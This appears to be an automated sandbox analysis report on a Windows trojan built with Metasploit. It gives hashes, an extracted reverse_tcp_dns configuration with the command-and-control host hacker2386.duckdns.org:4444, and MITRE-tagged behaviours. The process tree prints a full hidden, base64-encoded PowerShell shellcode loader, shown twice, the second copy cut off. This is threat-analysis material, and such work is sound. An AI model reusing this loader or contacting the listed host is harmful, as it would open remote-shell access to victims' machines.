metasploit | f2ca01177834859fa2f60bc1d060949ea88c15e38aa2de021f16dfdcea804724

General

Target

d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe
Size

318KB
MD5

d39fccd98f2225bba9db7ba4636ceef3
SHA1

a333cbb04d50cc455c2084933b21bbb2ef370a4f
SHA256

f2ca01177834859fa2f60bc1d060949ea88c15e38aa2de021f16dfdcea804724
SHA512

e8d8c36f30f0072db21ed2a7c1e3cc4c0301b83d8348d1f474fac9e2228a1666c548da2bca1c8d539dac0cfaf09422659df3a62cb9b2e02876794773b132b0f3
SSDEEP

6144:wtNb6TiU8liKNKCkC2Uus2czyD6FOWqxVyliAy7O6KLRvv7D:wtN+PznJTfc+mjpU/OtpD

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp_dns

C2

hacker2386.duckdns.org:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Blocklisted process makes network request 7 IoCs

flow	pid	Process
3	2636	powershell.exe
3	2636	powershell.exe
3	2636	powershell.exe
3	2636	powershell.exe
3	2636	powershell.exe
3	2636	powershell.exe
3	2636	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1936	powershell.exe
2976	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1936	powershell.exe
2976	powershell.exe
2636	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2336 wrote to memory of 1936	2336	d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe	31
PID 2336 wrote to memory of 1936	2336	d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe	31
PID 2336 wrote to memory of 1936	2336	d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe	31
PID 1936 wrote to memory of 2976	1936	powershell.exe	33
PID 1936 wrote to memory of 2976	1936	powershell.exe	33
PID 1936 wrote to memory of 2976	1936	powershell.exe	33
PID 2976 wrote to memory of 2636	2976	powershell.exe	34
PID 2976 wrote to memory of 2636	2976	powershell.exe	34
PID 2976 wrote to memory of 2636	2976	powershell.exe	34
PID 2976 wrote to memory of 2636	2976	powershell.exe	34
PID 2636 wrote to memory of 2664	2636	powershell.exe	35
PID 2636 wrote to memory of 2664	2636	powershell.exe	35
PID 2636 wrote to memory of 2664	2636	powershell.exe	35
PID 2636 wrote to memory of 2664	2636	powershell.exe	35
PID 2664 wrote to memory of 2648	2664	csc.exe	36
PID 2664 wrote to memory of 2648	2664	csc.exe	36
PID 2664 wrote to memory of 2648	2664	csc.exe	36
PID 2664 wrote to memory of 2648	2664	csc.exe	36

C:\Users\Admin\AppData\Local\Temp\d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JAB3AHkAegBWACAAPQAgACcAJABvAFMAUwBaACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG8AUwBTAFoAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBiACwAMAB4ADUANwAsADAAeAAwADEALAAwAHgAYQA5ACwAMAB4AGYAYQAsADAAeABkADkALAAwAHgAZQA4ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABmACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1AGEALAAwAHgAMQAxACwAMAB4ADAAMwAsADAAeAA1AGEALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABhADIALAAwAHgAZgBkACwAMAB4ADQAMQAsADAAeAA3ADgALAAwAHgANABjACwAMAB4AGYAZQAsADAAeAA5ADEALAAwAHgAMQBkACwAMAB4AGMANQAsADAAeAAxAGIALAAwAHgAYQAwACwAMAB4ADEAZAAsADAAeABiADEALAAwAHgANgA4ACwAMAB4ADkAMwAsADAAeABhAGQALAAwAHgAYgAyACwAMAB4ADMAZAAsADAAeAAxADgALAAwAHgANAA1ACwAMAB4ADkANgAsADAAeABkADUALAAwAHgAYQBiACwAMAB4ADIAYgAsADAAeAAzAGUALAAwAHgAZAA5ACwAMAB4ADEAYwAsADAAeAA4ADEALAAwAHgAMQA4ACwAMAB4AGQANAAsADAAeAA5AGQALAAwAHgAYgBhACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgAMQBlACwAMAB4AGMAMQAsADAAeAA4AGMALAAwAHgANQA3ACwAMAB4ADEAZgAsADAAeAAwAGEALAAwAHgAYwAxACwAMAB4ADkANgAsADAAeAA1ADgALAAwAHgANwA3ACwAMAB4ADIAYgAsADAAeABjAGEALAAwAHgAMwAxACwAMAB4AGYAMwAsADAAeAA5ADkALAAwAHgAZgBiACwAMAB4ADMANgAsADAAeAA0ADkALAAwAHgAMgAxACwAMAB4ADcANwAsADAAeAAwADQALAAwAHgANQBmACwAMAB4ADIAMQAsADAAeAA2ADQALAAwAHgAZABkACwAMAB4ADUAZQAsADAAeAAwADAALAAwAHgAMwBiACwAMAB4ADUANQAsADAAeAAzADkALAAwAHgAOAAyACwAMAB4AGIAZAAsADAAeABiAGEALAAwAHgAMwAxACwAMAB4ADgAYgAsADAAeABhADUALAAwAHgAZABmACwAMAB4ADcAYwAsADAAeAA0ADIALAAwAHgANQBkACwAMAB4ADIAYgAsADAAeAAwAGEALAAwAHgANQA1ACwAMAB4AGIANwAsADAAeAA2ADUALAAwAHgAZgAzACwAMAB4AGYAOQAsADAAeABmADYALAAwAHgANAA5ACwAMAB4ADAANgAsADAAeAAwADAALAAwAHgAMwBlACwAMAB4ADYAZAAsADAAeABmADkALAAwAHgANwA3ACwAMAB4ADMANgAsADAAeAA4AGQALAAwAHgAOAA0ACwAMAB4ADgAZgAsADAAeAA4AGQALAAwAHgAZQBmACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgAMQA2ACwAMAB4ADUANwAsADAAeAAxADAALAAwAHgAYgBjACwAMAB4AGYAMgAsADAAeAA2ADkALAAwAHgAZgA1ACwAMAB4ADUAYQAsADAAeAA3ADAALAAwAHgANgA1ACwAMAB4AGIAMgAsADAAeAAyADkALAAwAHgAZABlACwAMAB4ADYAYQAsADAAeAA0ADUALAAwAHgAZgBlACwAMAB4ADUANAAsADAAeAA5ADYALAAwAHgAYwBlACwAMAB4ADAAMQAsADAAeABiAGIALAAwAHgAMQBlACwAMAB4ADkANAAsADAAeAAyADUALAAwAHgAMQBmACwAMAB4ADcAYQAsADAAeAA0AGUALAAwAHgANAA0ACwAMAB4ADAANgAsADAAeAAyADYALAAwAHgAMgAxACwAMAB4ADcAOQAsADAAeAA1ADgALAAwAHgAOAA5ACwAMAB4ADkAZQAsADAAeABkAGYALAAwAHgAMQAyACwAMAB4ADIANAAsADAAeABjAGEALAAwAHgANQAyACwAMAB4ADcAOQAsADAAeAAyADEALAAwAHgAMwBmACwAMAB4ADUAZQAsADAAeAA4ADIALAAwAHgAYgAxACwAMAB4ADUANwAsADAAeABlADkALAAwAHgAZgAxACwAMAB4ADgAMwAsADAAeABmADgALAAwAHgANAAxACwAMAB4ADkAZQAsADAAeABhAGYALAAwAHgANwAxACwAMAB4ADQAZgAsADAAeAA1ADkALAAwAHgAYwBmACwAMAB4AGEAYgAsADAAeAAzADcALAAwAHgAZgA1ACwAMAB4ADIAZQAsADAAeAA1ADQALAAwAHgANAA3ACwAMAB4AGQAZgAsADAAeABmADQALAAwAHgAMAAwACwAMAB4ADEANwAsADAAeAA3ADcALAAwAHgAZABjACwAMAB4ADIAOAAsADAAeABmAGMALAAwAHgAOAA3ACwAMAB4AGUAMQAsADAAeABmAGMALAAwAHgANQAyACwAMAB4AGQAOAAsADAAeAA0AGQALAAwAHgAYQBmACwAMAB4ADEAMgAsADAAeAA4ADgALAAwAHgAMgBkACwAMAB4ADEAZgAsADAAeABmAGEALAAwAHgAYwAyACwAMAB4AGEAMQAsADAAeAA0ADAALAAwAHgAMQBhACwAMAB4AGUAZAAsADAAeAA2AGIALAAwAHgAZQA5ACwAMAB4ADMAMgAsADAAeAAwADUALAAwAHgAOQA0ACwAMAB4ADEANgAsADAAeABjADIALAAwAHgANAAyACwAMAB4AGYANQAsADAAeAA3ADUALAAwAHgAYQA5ACwAMAB4AGYANwAsADAAeAA4ADcALAAwAHgANABiACwAMAB4ADEAZQAsADAAeABjADAALAAwAHgANQAxACwAMAB4ADgAMgAsADAAeAAwADQALAAwAHgANAA1ACwAMAB4AGYAZAAsADAAeABiADEALAAwAHgAYQAwACwAMAB4AGMAYgAsADAAeAA3ADIALAAwAHgANgA4ACwAMAB4ADQANwAsADAAeAA2ADYALAAwAHgAMQAyACwAMAB4ADcANAAsADAAeABmAGYALAAwAHgAMgBmACwAMAB4AGYANAAsADAAeAA0ADAALAAwAHgANwBmACwAMAB4AGQAMAAsADAAeABkADAALAAwAHgAMgAyACwAMAB4ADMAZgAsADAAeAAzADMALAAwAHgAYgAxACwAMAB4ADMAZQAsADAAeABlAGYALAAwAHgAMgAzACwAMAB4ADQANwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4AGUAOAAsADAAeABjAGUALAAwAHgAZAA5ACwAMAB4ADQAYQAsADAAeAAwADAALAAwAHgAOAA3ACwAMAB4ADcAMgAsADAAeABlADIALAAwAHgAYgA5ACwAMAB4ADgAMgAsADAAeAAwADkALAAwAHgAOQAzACwAMAB4ADQANgAsADAAeAAxADkALAAwAHgANwA0ACwAMAB4ADkAMwAsADAAeABjAGQALAAwAHgAYQBlACwAMAB4ADgAOAAsADAAeAA1AGQALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA5AGEALAAwAHgAMAA5ACwAMAB4AGMANgAsADAAeAA5ADEALAAwAHgAYwAxACwAMAB4ADkAZgAsADAAeABkADkALAAwAHgAMABmACwAMAB4ADYAZgAsADAAeAAxAGYALAAwAHgANABjACwAMAB4AGIANAAsADAAeAAyADYALAAwAHgANAA4ACwAMAB4AGYAOAAsADAAeABiADYALAAwAHgAMQBmACwAMAB4AGIAZQAsADAAeABhADcALAAwAHgANAA5ACwAMAB4ADQAYQAsADAAeABiADUALAAwAHgANgBlACwAMAB4AGQAYwAsADAAeAAzADUALAAwAHgAYQAxACwAMAB4ADgAZQAsADAAeAAzADAALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeABkADkALAAwAHgANQBhACwAMAB4AGIANgAsADAAeAA1ADkALAAwAHgAYgBkACwAMAB4ADMAZQAsADAAeABlADUALAAwAHgANwBjACwAMAB4AGMAMgAsADAAeABlAGEALAAwAHgAOQA5ACwAMAB4ADIAZAAsADAAeAA1ADcALAAwAHgAMQA1ACwAMAB4AGMAOAAsADAAeAA4ADIALAAwAHgAZgAwACwAMAB4ADcAZAAsADAAeABmADYALAAwAHgAZgBkACwAMAB4ADMANwAsADAAeAAyADIALAAwAHgAMAA5ACwAMAB4ADIAOAAsADAAeABjADYALAAwAHgAMQBlACwAMAB4AGQAYwAsADAAeAAxADQALAAwAHgAYgBjACwAMAB4ADQAZQAsADAAeABkAGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkADIASwBLAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAAyAEsASwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAMgBLAEsALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB3AHkAegBWACkAKQA7ACQANwBxADEAWAAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGIAWgBMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGIAWgBMACAAJAA3AHEAMQBYACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkADcAcQAxAFgAIAAkAGUAIgA7AH0A
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JAB3AHkAegBWACAAPQAgACcAJABvAFMAUwBaACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG8AUwBTAFoAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBiACwAMAB4ADUANwAsADAAeAAwADEALAAwAHgAYQA5ACwAMAB4AGYAYQAsADAAeABkADkALAAwAHgAZQA4ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABmACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1AGEALAAwAHgAMQAxACwAMAB4ADAAMwAsADAAeAA1AGEALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABhADIALAAwAHgAZgBkACwAMAB4ADQAMQAsADAAeAA3ADgALAAwAHgANABjACwAMAB4AGYAZQAsADAAeAA5ADEALAAwAHgAMQBkACwAMAB4AGMANQAsADAAeAAxAGIALAAwAHgAYQAwACwAMAB4ADEAZAAsADAAeABiADEALAAwAHgANgA4ACwAMAB4ADkAMwAsADAAeABhAGQALAAwAHgAYgAyACwAMAB4ADMAZAAsADAAeAAxADgALAAwAHgANAA1ACwAMAB4ADkANgAsADAAeABkADUALAAwAHgAYQBiACwAMAB4ADIAYgAsADAAeAAzAGUALAAwAHgAZAA5ACwAMAB4ADEAYwAsADAAeAA4ADEALAAwAHgAMQA4ACwAMAB4AGQANAAsADAAeAA5AGQALAAwAHgAYgBhACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgAMQBlACwAMAB4AGMAMQAsADAAeAA4AGMALAAwAHgANQA3ACwAMAB4ADEAZgAsADAAeAAwAGEALAAwAHgAYwAxACwAMAB4ADkANgAsADAAeAA1ADgALAAwAHgANwA3ACwAMAB4ADIAYgAsADAAeABjAGEALAAwAHgAMwAxACwAMAB4AGYAMwAsADAAeAA5ADkALAAwAHgAZgBiACwAMAB4ADMANgAsADAAeAA0ADkALAAwAHgAMgAxACwAMAB4ADcANwAsADAAeAAwADQALAAwAHgANQBmACwAMAB4ADIAMQAsADAAeAA2ADQALAAwAHgAZABkACwAMAB4ADUAZQAsADAAeAAwADAALAAwAHgAMwBiACwAMAB4ADUANQAsADAAeAAzADkALAAwAHgAOAAyACwAMAB4AGIAZAAsADAAeABiAGEALAAwAHgAMwAxACwAMAB4ADgAYgAsADAAeABhADUALAAwAHgAZABmACwAMAB4ADcAYwAsADAAeAA0ADIALAAwAHgANQBkACwAMAB4ADIAYgAsADAAeAAwAGEALAAwAHgANQA1ACwAMAB4AGIANwAsADAAeAA2ADUALAAwAHgAZgAzACwAMAB4AGYAOQAsADAAeABmADYALAAwAHgANAA5ACwAMAB4ADAANgAsADAAeAAwADAALAAwAHgAMwBlACwAMAB4ADYAZAAsADAAeABmADkALAAwAHgANwA3ACwAMAB4ADMANgAsADAAeAA4AGQALAAwAHgAOAA0ACwAMAB4ADgAZgAsADAAeAA4AGQALAAwAHgAZQBmACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgAMQA2ACwAMAB4ADUANwAsADAAeAAxADAALAAwAHgAYgBjACwAMAB4AGYAMgAsADAAeAA2ADkALAAwAHgAZgA1ACwAMAB4ADUAYQAsADAAeAA3ADAALAAwAHgANgA1ACwAMAB4AGIAMgAsADAAeAAyADkALAAwAHgAZABlACwAMAB4ADYAYQAsADAAeAA0ADUALAAwAHgAZgBlACwAMAB4ADUANAAsADAAeAA5ADYALAAwAHgAYwBlACwAMAB4ADAAMQAsADAAeABiAGIALAAwAHgAMQBlACwAMAB4ADkANAAsADAAeAAyADUALAAwAHgAMQBmACwAMAB4ADcAYQAsADAAeAA0AGUALAAwAHgANAA0ACwAMAB4ADAANgAsADAAeAAyADYALAAwAHgAMgAxACwAMAB4ADcAOQAsADAAeAA1ADgALAAwAHgAOAA5ACwAMAB4ADkAZQAsADAAeABkAGYALAAwAHgAMQAyACwAMAB4ADIANAAsADAAeABjAGEALAAwAHgANQAyACwAMAB4ADcAOQAsADAAeAAyADEALAAwAHgAMwBmACwAMAB4ADUAZQAsADAAeAA4ADIALAAwAHgAYgAxACwAMAB4ADUANwAsADAAeABlADkALAAwAHgAZgAxACwAMAB4ADgAMwAsADAAeABmADgALAAwAHgANAAxACwAMAB4ADkAZQAsADAAeABhAGYALAAwAHgANwAxACwAMAB4ADQAZgAsADAAeAA1ADkALAAwAHgAYwBmACwAMAB4AGEAYgAsADAAeAAzADcALAAwAHgAZgA1ACwAMAB4ADIAZQAsADAAeAA1ADQALAAwAHgANAA3ACwAMAB4AGQAZgAsADAAeABmADQALAAwAHgAMAAwACwAMAB4ADEANwAsADAAeAA3ADcALAAwAHgAZABjACwAMAB4ADIAOAAsADAAeABmAGMALAAwAHgAOAA3ACwAMAB4AGUAMQAsADAAeABmAGMALAAwAHgANQAyACwAMAB4AGQAOAAsADAAeAA0AGQALAAwAHgAYQBmACwAMAB4ADEAMgAsADAAeAA4ADgALAAwAHgAMgBkACwAMAB4ADEAZgAsADAAeABmAGEALAAwAHgAYwAyACwAMAB4AGEAMQAsADAAeAA0ADAALAAwAHgAMQBhACwAMAB4AGUAZAAsADAAeAA2AGIALAAwAHgAZQA5ACwAMAB4ADMAMgAsADAAeAAwADUALAAwAHgAOQA0ACwAMAB4ADEANgAsADAAeABjADIALAAwAHgANAAyACwAMAB4AGYANQAsADAAeAA3ADUALAAwAHgAYQA5ACwAMAB4AGYANwAsADAAeAA4ADcALAAwAHgANABiACwAMAB4ADEAZQAsADAAeABjADAALAAwAHgANQAxACwAMAB4ADgAMgAsADAAeAAwADQALAAwAHgANAA1ACwAMAB4AGYAZAAsADAAeABiADEALAAwAHgAYQAwACwAMAB4AGMAYgAsADAAeAA3ADIALAAwAHgANgA4ACwAMAB4ADQANwAsADAAeAA2ADYALAAwAHgAMQAyACwAMAB4ADcANAAsADAAeABmAGYALAAwAHgAMgBmACwAMAB4AGYANAAsADAAeAA0ADAALAAwAHgANwBmACwAMAB4AGQAMAAsADAAeABkADAALAAwAHgAMgAyACwAMAB4ADMAZgAsADAAeAAzADMALAAwAHgAYgAxACwAMAB4ADMAZQAsADAAeABlAGYALAAwAHgAMgAzACwAMAB4ADQANwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4AGUAOAAsADAAeABjAGUALAAwAHgAZAA5ACwAMAB4ADQAYQAsADAAeAAwADAALAAwAHgAOAA3ACwAMAB4ADcAMgAsADAAeABlADIALAAwAHgAYgA5ACwAMAB4ADgAMgAsADAAeAAwADkALAAwAHgAOQAzACwAMAB4ADQANgAsADAAeAAxADkALAAwAHgANwA0ACwAMAB4ADkAMwAsADAAeABjAGQALAAwAHgAYQBlACwAMAB4ADgAOAAsADAAeAA1AGQALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA5AGEALAAwAHgAMAA5ACwAMAB4AGMANgAsADAAeAA5ADEALAAwAHgAYwAxACwAMAB4ADkAZgAsADAAeABkADkALAAwAHgAMABmACwAMAB4ADYAZgAsADAAeAAxAGYALAAwAHgANABjACwAMAB4AGIANAAsADAAeAAyADYALAAwAHgANAA4ACwAMAB4AGYAOAAsADAAeABiADYALAAwAHgAMQBmACwAMAB4AGIAZQAsADAAeABhADcALAAwAHgANAA5ACwAMAB4ADQAYQAsADAAeABiADUALAAwAHgANgBlACwAMAB4AGQAYwAsADAAeAAzADUALAAwAHgAYQAxACwAMAB4ADgAZQAsADAAeAAzADAALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeABkADkALAAwAHgANQBhACwAMAB4AGIANgAsADAAeAA1ADkALAAwAHgAYgBkACwAMAB4ADMAZQAsADAAeABlADUALAAwAHgANwBjACwAMAB4AGMAMgAsADAAeABlAGEALAAwAHgAOQA5ACwAMAB4ADIAZAAsADAAeAA1ADcALAAwAHgAMQA1ACwAMAB4AGMAOAAsADAAeAA4ADIALAAwAHgAZgAwACwAMAB4ADcAZAAsADAAeABmADYALAAwAHgAZgBkACwAMAB4ADMANwAsADAAeAAyADIALAAwAHgAMAA5ACwAMAB4ADIAOAAsADAAeABjADYALAAwAHgAMQBlACwAMAB4AGQAYwAsADAAeAAxADQALAAwAHgAYgBjACwAMAB4ADQAZQAsADAAeABkAGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkADIASwBLAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAAyAEsASwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAMgBLAEsALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMA